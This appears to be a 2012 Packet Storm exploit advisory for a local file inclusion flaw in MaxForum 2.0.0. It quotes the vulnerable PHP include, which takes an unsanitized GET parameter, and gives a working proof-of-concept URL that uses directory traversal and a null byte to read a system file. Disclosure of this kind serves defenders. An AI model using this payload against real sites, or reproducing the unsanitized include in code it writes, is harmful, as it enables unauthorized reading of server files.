Lucene search

K
packetstormL0n3ly-H34rTPACKETSTORM:116870
HistorySep 26, 2012 - 12:00 a.m.

MaxForum 2.0.0 Local File Inclusion

2012-09-2600:00:00
L0n3ly-H34rT
packetstormsecurity.com
24
`############################################  
### Exploit Title: MaxForum v2.0.0 Local File Inclusion Vulnerability  
### Date: 25/09/2012   
### Author: L0n3ly-H34rT   
### Contact: [email protected]   
### My Site: http://se3c.blogspot.com/   
### Vendor Link: http://www.max4dev.com/demo/ar/  
### Software Link: http://sourceforge.net/projects/maxforum/files/2.0.0/Max_v2.0.0.zip/download  
### Version : 2.0.0 ( may be old version is affect! i don't check )  
### Tested on: Linux/Windows   
############################################  
  
# Affected file ( includes/pages/gallery.php ) on line 42 :  
  
include 'gallery/' . $_GET['act'] . '.php';  
  
# P.O.C :  
  
http://127.0.0.1/max2/index.php?act=../../../../../../../boot.ini%00&page=gallery  
  
############################################  
  
# Note :  
  
Must be magic_quotes_gpc = Off  
  
# Greetz to my friendz  
`